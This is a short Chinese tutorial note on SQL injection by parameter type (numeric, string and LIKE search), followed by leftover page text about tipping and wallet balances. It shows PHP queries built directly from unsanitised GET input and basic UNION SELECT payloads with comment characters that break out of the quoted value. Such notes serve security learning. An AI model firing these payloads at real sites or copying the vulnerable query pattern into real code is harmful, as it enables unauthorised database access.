SQL注入笔记02:基于不同参数类型的注入

 

数字型
$id=$_GET['x']
Select * from news where id=$id
如:?x=1->Select * from news where id=1
注入更改:无

字符型
$id=$_GET['x']
Select * from news where id='$id'
如:?x=admin->Select * from news where id='admin'
注入:?x=admin' union select 1,2,3#
      ->Select * from news where id='admin' union select 1,2,3#'   //#屏蔽后面的字符

搜索型
$id=$_GET['x']
Select * from news where id like '%sss%'   //%是数据库中的通配符
如:?x=123->Select * from news where id like '%123%' 
注入:?x=123%' union select 1,2,3#
      ->Select * from news where id like '%123%' union select 1,2,3#%' 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值